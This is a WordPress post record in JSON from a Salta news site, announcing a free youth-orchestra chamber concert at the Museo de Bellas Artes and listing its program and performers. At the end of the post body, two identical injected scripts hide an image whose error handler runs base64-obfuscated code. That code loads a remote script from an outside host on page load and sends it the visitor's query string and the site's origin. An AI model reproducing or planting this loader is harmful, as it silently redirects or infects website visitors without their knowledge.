{"id":3028,"date":"2023-08-28T20:23:39","date_gmt":"2023-08-28T23:23:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3028"},"modified":"2025-08-14T00:09:44","modified_gmt":"2025-08-14T03:09:44","slug":"la-orquesta-sinfonica-infantil-y-juvenil-presenta-nuevos-desafios-musicales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3028","title":{"rendered":"La Orquesta Sinf\u00f3nica Infantil y Juvenil presenta \u201cNuevos desaf\u00edos musicales\u201d"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#96053d\"><em>El Departamento de M\u00fasica de C\u00e1mara de la OSIJS se presentar\u00e1 el 1 de septiembre a las 19 horas en el Museo de Bellas Artes, Av. Belgrano 992.<\/em><\/h4>\n\n\n\n<p>Con el objetivo de apoyar a los j\u00f3venes int\u00e9rpretes en la pr\u00e1ctica de la presentaci\u00f3n p\u00fablica y mostrar los logros alcanzados en el primer cuatrimestre, tanto en el aspecto t\u00e9cnico y musical, como en el desempe\u00f1o personal y expresivo, el Departamento de M\u00fasica de C\u00e1mara de la Orquesta Sinf\u00f3nica Infantil y Juvenil presentar\u00e1 el conciertos de alumnos denominado \u201cNuevos Desaf\u00edos Musicales\u201d.<\/p>\n\n\n\n<p>El&nbsp;concierto estar\u00e1&nbsp;destinado al p\u00fablico en general y se llevar\u00e1 a cabo el viernes&nbsp;1&nbsp;de septiembre a las 19&nbsp;en el Museo de Bellas Artes, Av. Belgrano 992. Con entrada libre y gratuita.<\/p>\n\n\n\n<p>El Departamento de M\u00fasica de C\u00e1mara se encuentra a cargo de las profesoras Tetyana Kozimirova, Georgina Luza y Blanca Zintak.<\/p>\n\n\n\n<p>El programa estar\u00e1 comprendido por las obras de Georg H\u00e4ndel, Melod\u00eda del Oratorio \u201cJudas Macabeo\u201d, Luz Angelina Ruiz en viol\u00edn y la profesora Georgina Luza como pianista acompa\u00f1ante; tambi\u00e9n se presentar\u00e1 Leopold Mozart, 12 d\u00faos para viola, N\u00ba 6 Allegro ma non troppo y N\u00ba 5 Alla breve. La interpretaci\u00f3n en violas estar\u00e1 a cargo de Sabrina Maita Briones y Carolina Jarma; la obra de Kaspar Kummer, Deus Duos Op. 46, estar\u00e1 a cargo de Agust\u00edn Guaymas en Flauta y Jano Ismael Flores en Clarinete.<\/p>\n\n\n\n<p>Otras obras que complementa el programa son de Piotr Tchaikovsky, \u201cLlegada de los cisnes\u201d, para piano a 4 manos, interpretada por las pianistas Candelaria Montenegro y Liam Tadeo Herrera; el Preludio a cargo de Dmitri Schostakovich; los violines estar\u00e1n a cargo de Dana\u00e9 Avril Garc\u00eda Flores y Concepci\u00f3n Diana \u00c1gueda Guti\u00e9rrez Cruz, junto a Ana Luc\u00eda Doric en Piano.<\/p>\n\n\n\n<p>Finalmente, se realizar\u00e1 la interpretaci\u00f3n de Werner de Bleser, \u201cTwo of a Kind\u201d para flauta por Ariana Guti\u00e9rrez Neri y Bran Liz\u00e1rraga en clarinete.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-orquesta-sinfonica-infantil-y-juvenil-presenta-nuevos-desafios-musicales-91398\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Departamento de M\u00fasica de C\u00e1mara de la OSIJS se presentar\u00e1 el 1 de septiembre a las 19 horas en el Museo de Bellas Artes, Av. Belgrano 992. Con el objetivo de apoyar a los j\u00f3venes int\u00e9rpretes en la pr\u00e1ctica de la presentaci\u00f3n p\u00fablica y mostrar los logros alcanzados en el primer cuatrimestre, tanto en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3029,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13],"tags":[],"class_list":{"0":"post-3028","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3028"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3028"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3028\/revisions"}],"predecessor-version":[{"id":6982,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3028\/revisions\/6982"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3029"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}